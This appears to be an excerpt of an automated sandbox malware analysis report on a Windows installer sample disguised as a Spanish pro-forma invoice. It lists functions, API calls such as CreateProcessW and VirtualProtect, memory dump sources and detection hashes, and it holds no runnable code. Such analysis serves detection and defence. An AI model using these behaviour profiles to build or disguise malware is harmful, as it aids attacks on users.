                                                  • Snapshot File: hcaresult_0_2_707e0000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 7d0aadc10652f6bef744a5de5c1d62c8fdde94dc8579bb37a20c7be51bf91b69
                                                  • Instruction ID: 25500b58b571edda6f030b55e89266dcdb615907c344cb44b71d825715bc4d7e
                                                  • Opcode Fuzzy Hash: 7d0aadc10652f6bef744a5de5c1d62c8fdde94dc8579bb37a20c7be51bf91b69
                                                  • Instruction Fuzzy Hash: 844160B2602209EFDB21DF77DE8AB5D3775EB44314F70842DF905C7120E638A9829B95
                                                  Function 004028B6 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028D4
                                                    • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: FilePointerwsprintf
                                                  • String ID:
                                                  • API String ID: 327478801-0
                                                  • Opcode ID: b3aac8c5f01f2ed12bfadd754a2b6a30c5dc7cfe9e6ec30e7376c2659666ee05
                                                  • Instruction ID: 4b337157aa156bcda2895cdf97a766d2508ebf8f458e9d0ecd0aa362e59b9688
                                                  • Opcode Fuzzy Hash: b3aac8c5f01f2ed12bfadd754a2b6a30c5dc7cfe9e6ec30e7376c2659666ee05
                                                  • Instruction Fuzzy Hash: 08E06D71904104BFDB00ABA5AE498AE7379AB80359B20443FF101B10D4C6794C119A2D
                                                  Function 004063DC Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 00406405
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                  • Instruction ID: 15c5175e75f921513b7f3d75ccef30e451623c4c54541e9d5ee9eac1385433f3
                                                  • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                  • Instruction Fuzzy Hash: 1DE0E6B2010109BFEF195F50DD0AD7B371DEB04310F01492EFE16D4051E6B5E9306674
                                                  Function 004060E3 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,0040349F,00000000,00414EC0,?,00414EC0,?,000000FF,?,00000000), ref: 004060F7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                  • Instruction ID: b9d802e93a63440494d75fc60edee4ff4d41d1542efeb3ab79d4fb436c6ecda5
                                                  • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                  • Instruction Fuzzy Hash: 91E08C3220422AABEF109E909C04EEB3B6CEB003A0F014432FD26E6050D271E9319BA4
                                                  Function 004060B4 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,000000FF,?,004034D1,00000000,00000000,00403328,000000FF,?,00000000,00000000,00000000), ref: 004060C8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                  • Instruction ID: 0a9ed9335d9fcbf33a9b7557f86da276afb46ac39f2db62fb679b5cfb923300a
                                                  • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                  • Instruction Fuzzy Hash: C1E0BF32250269ABDF109E559C00AAB775CEB05251F014436B955E7150D671E92197A4
                                                  Function 707E2A7F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(707E505C,?,00000040,707E504C), ref: 707E2A9D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84226363291.00000000707E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 707E0000, based on PE: true
                                                  • Associated: 00000000.00000002.84226292605.00000000707E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.84226422708.00000000707E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.84226496862.00000000707E6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_707e0000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 10fe05949a510210cc1ef572c5906f3506d538f17a97e04b36627f0baa6f1b7a
                                                  • Instruction ID: bfb75e6778cd16619b32681a34fdffe09cd24c83c298d1d051d1c6296e3c93b9
                                                  • Opcode Fuzzy Hash: 10fe05949a510210cc1ef572c5906f3506d538f17a97e04b36627f0baa6f1b7a
                                                  • Instruction Fuzzy Hash: 14F0ACB260328ADEC3A0CF3B8C847093BE0B704314BA4456AF688D6260E3744444CB99
                                                  Function 00402419 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040244A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileString
                                                  • String ID:
                                                  • API String ID: 1096422788-0
                                                  • Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                  • Instruction ID: 53345aa50f94a5dbc05c73a67e8aa0b188b477950ab0ef6c1fe412bbc790425e
                                                  • Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                  • Instruction Fuzzy Hash: E7E04F3180021AAADB00AFA0CE0ADAD3678AF00304F10493EF510BB0D1E7F889509759
                                                  Function 004063AE Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,0040643C,?,?,?,?,Call,?,00000000), ref: 004063D2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                  • Instruction ID: 160c38975f312424f4866d14917befa5dd24af40cdf73f4d33e28196d90f96f9
                                                  • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                  • Instruction Fuzzy Hash: 44D0123204020EBBDF115E90ED01FAB3B1DAB08350F014426FE06E40A0D775D534A754
                                                  Function 0040450C Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00010430,00000000,00000000,00000000), ref: 0040451E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                  • Instruction ID: 43b4292f00af6435b8222dbb4ed8e84b3d95e84959177ba0714352b3dfcaa9b9
                                                  • Opcode Fuzzy Hash: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                  • Instruction Fuzzy Hash: 40C09BF17413017BDA209B509E45F1777989795701F15453D7350F50E0CBB4E450D61D
                                                  Function 004034D4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403267,?), ref: 004034E2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                  • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                  • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                  • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                  Function 004044F5 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000028,?,?,00404320), ref: 00404503
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                  • Instruction ID: a1e91a2b22b377b77c28deac9acb262fc7b3ebada01c3a2f9bc193e64980b6bc
                                                  • Opcode Fuzzy Hash: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                  • Instruction Fuzzy Hash: E9B09236690A40AADA215B00DE09F867B62A7A8701F008438B240640B0CAB204A1DB08
                                                  Function 004044E2 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,004042B9), ref: 004044EC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                  • Instruction ID: bf70c606a766814dc6d2ff6c1013b69bc1ca18b78975ad7518874070628387b3
                                                  • Opcode Fuzzy Hash: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                  • Instruction Fuzzy Hash: BEA00176544900ABCA16AB50EF0980ABB72BBA8701B528879A285510388B725921FB19
                                                  Function 00401FC9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004055C6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                    • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                    • Part of subcall function 004055C6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00403412,00403412,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405621
                                                    • Part of subcall function 004055C6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll), ref: 00405633
                                                    • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                    • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                    • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                    • Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                    • Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
                                                    • Part of subcall function 004069E0: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069F1
                                                    • Part of subcall function 004069E0: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A13
                                                    • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                  • String ID:
                                                  • API String ID: 2972824698-0
                                                  • Opcode ID: 67f6c5776c246ab8605e5966e58075b047f153bd8e2a94f4ca5f940a292a99d1
                                                  • Instruction ID: 2b527fce213089fa12a92f7baeb69a5519dacc7bd52e038cdd259e112745fe09
                                                  • Opcode Fuzzy Hash: 67f6c5776c246ab8605e5966e58075b047f153bd8e2a94f4ca5f940a292a99d1
                                                  • Instruction Fuzzy Hash: D0F09632904611ABDF30BBA59A895DF76B49F0035CF21413FE202B25D5C6BD4E41E76E
                                                  Function 707E12BB Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalAlloc.KERNELBASE(00000040,?,707E12DB,?,707E137F,00000019,707E11CA,-000000A0), ref: 707E12C5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84226363291.00000000707E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 707E0000, based on PE: true
                                                  • Associated: 00000000.00000002.84226292605.00000000707E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.84226422708.00000000707E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.84226496862.00000000707E6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_707e0000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: AllocGlobal
                                                  • String ID:
                                                  • API String ID: 3761449716-0
